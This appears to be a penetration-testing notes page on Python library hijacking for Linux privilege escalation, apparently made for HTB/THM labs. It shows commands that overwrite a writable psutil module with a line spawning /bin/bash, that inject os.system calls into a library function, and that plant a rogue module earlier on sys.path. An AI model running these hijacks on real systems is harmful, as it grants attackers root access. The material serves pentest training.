search
inHTBTHM
githubEdit

Python library hijacking

discover any script work on SUID Privilege then try to discover the content of this file for searching to any function can we abuse of her content

grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*
# we choose pustil becuse we imported this library on the script
# then discover any file have a writeble permission

 ls -l /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
 #then
 echo "import os;os.system('/bin/bash')" > /usr/local/lib/python3.8/dist-packages/psutil/__init__.py

hashtag
Wrong Write Permissions

then hijack this file

...SNIP...

def virtual_memory():

	...SNIP...
	#### Hijacking
	**import os
	os.system('id')**
	

    global _TOTAL_PHYMEM
    ret = _psplatform.virtual_memory()
    # cached for later use in Process.memory_percent()
    _TOTAL_PHYMEM = ret.total
    return ret

...SNIP...

privesc

hashtag
Library Path

first when import library in python the system start search first in the directory of this script then if not found this library it will start search on sys.path . we aim to abuse on this path to add file with the name of library to take a root permission

locate of library

Discover directory permission

After checking all of the directories listed, it appears that /usr/lib/python3.8 path is misconfigured in a way to allow any user to write to it. Cross-checking with values from the PYTHONPATH variable, we can see that this path is higher on the list than the path in which psutil is installed in. Let us try abusing this misconfiguration to create our own psutil module containing our own malicious virtual_memory() function within the /usr/lib/python3.8 directory.

Hijack Module

Privesc

hashtag
PYTHONPATH Environment Variable

must have SETENV in sudo permission

PreviousShared Object HijackingNextSudo